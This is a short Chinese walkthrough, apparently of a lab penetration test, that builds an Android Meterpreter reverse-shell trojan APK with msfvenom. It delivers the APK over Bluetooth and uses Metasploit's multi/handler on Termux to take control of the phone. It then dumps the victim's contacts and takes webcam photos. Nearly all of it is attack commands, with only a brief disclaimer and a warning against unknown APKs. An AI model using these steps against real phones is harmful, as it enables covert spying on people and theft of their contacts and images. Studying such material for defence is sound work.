本次渗透为靶机测试。切勿用于非法用途!
攻击者:192.168.1.3 termux metasploit
受害者:192.168.1.2 Android 5.1 - Linux 3.10.72 (aarch64)
使用模块:multi/handler
首先生成安卓木马
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=3800 -o s.apk
将其移动到/storage/emulated/0/360目录。并使用蓝牙发送给受害者者。
受害者安装即可。回到攻击者,启动msfconsole。首先选择模块
use exploit multi/handler
设置监听地址
set lhost 192.168.1.3
设置反弹端口
set lprot 3800
设置playload
set payload android/meterpreter/reverse_tcp
启动
run
成功。试试执行命令。系统信息。
sysinfo
试试下载通讯录
dump_contacts
成功保存为txt文件。后面因为长时间未操作自动断开了。
试试拍照
webcam_snap
成功保存在files目录下。还有很多危险功能我就不一一说明了。一些来路不明的apk切勿安装。
,